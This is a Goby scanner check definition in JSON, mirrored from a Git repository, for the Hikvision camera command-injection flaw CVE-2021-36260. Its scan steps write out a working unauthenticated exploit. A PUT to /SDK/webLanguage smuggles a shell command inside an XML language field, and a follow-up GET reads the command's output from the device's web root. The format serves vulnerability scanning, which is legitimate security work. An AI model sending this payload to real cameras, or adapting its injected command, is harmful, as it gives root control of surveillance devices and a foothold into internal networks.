qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Hikvision_RCE_CVE_2021_3626...

112 lines
4.4 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Hikvision RCE CVE-2021-36260",
"Level": "3",
"Tags": [
"rce"
],
"GobyQuery": "app=\"Hikvision-Cameras-and-Surveillance\"",
"Description": "攻击者利用该漏洞可以用无限制的root shell来完全控制设备即使设备的所有者受限于有限的受保护shellpsh。除了入侵IP摄像头外还可以访问和攻击内部网络。\n该漏洞的利用并不需要用户交互攻击者只需要访问http或HTTPS服务器端口80/443即可利用该漏洞无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。",
"Product": "hikvision",
"Homepage": "https://www.hikvision.com/cn/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastheader|regex|"
]
},
{
"Request": {
"method": "PUT",
"uri": "/SDK/webLanguage",
"follow_redirect": false,
"header": {
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<language>$(ls -l >webLib/c)</language>",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/c",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-11-17 13:28:08",
"GobyVersion": "1.8.302"
}
Reference in New Issue View Git Blame Copy Permalink